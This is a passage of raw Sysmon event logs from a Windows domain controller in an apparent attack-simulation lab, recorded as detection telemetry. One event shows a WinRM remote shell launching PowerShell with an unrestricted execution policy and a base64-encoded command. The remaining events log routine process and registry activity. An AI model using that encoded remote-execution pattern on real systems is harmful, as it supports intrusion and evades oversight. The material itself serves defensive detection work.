13:34:39.563{59A5CD1D-8E6F-6005-8200-00000000A301}46964752C:\Windows\system32\WinrsHost.exe{59A5CD1D-8E6F-6005-8400-00000000A301}4772C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x80000000000000002838Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.577{59A5CD1D-8E6F-6005-8400-00000000A301}4772C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkAC:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E6F-6005-0185-070000000000}0x785010HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E6F-6005-8200-00000000A301}4696C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x80000000000000002837Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.563{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002836Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.563{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002835Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.563{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002834Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.501{59A5CD1D-8E46-6005-1400-00000000A301}13041784C:\Windows\system32\svchost.exe{59A5CD1D-8E6F-6005-8200-00000000A301}4696C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000002833Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E6F-6005-8200-00000000A301}4696C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002832Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.485{59A5CD1D-8E6F-6005-8300-00000000A301}47084728C:\Windows\system32\conhost.exe{59A5CD1D-8E6F-6005-8200-00000000A301}4696C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002831Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.470{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E6F-6005-8300-00000000A301}4708C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002830Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.470{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002829Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.470{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002828Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.470{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002827Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.470{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002826Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.470{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002825Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.470{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002824Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.470{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002823Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.470{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002822Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.470{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002821Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.470{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E6F-6005-8200-00000000A301}4696C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002820Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.470{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E6F-6005-8200-00000000A301}4696C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002819Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.479{59A5CD1D-8E6F-6005-8200-00000000A301}4696C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-8E6F-6005-0185-070000000000}0x785010HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{59A5CD1D-8E46-6005-0C00-00000000A301}596C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000002818Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.470{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002817Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.470{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002816Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.470{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x80000000000000002815Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.438{59A5CD1D-8E6F-6005-8100-00000000A301}4548C:\Windows\System32\taskhostw.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 13241300x80000000000000002814Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:39.345{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x000005db) 10341000x80000000000000002813Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.282{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C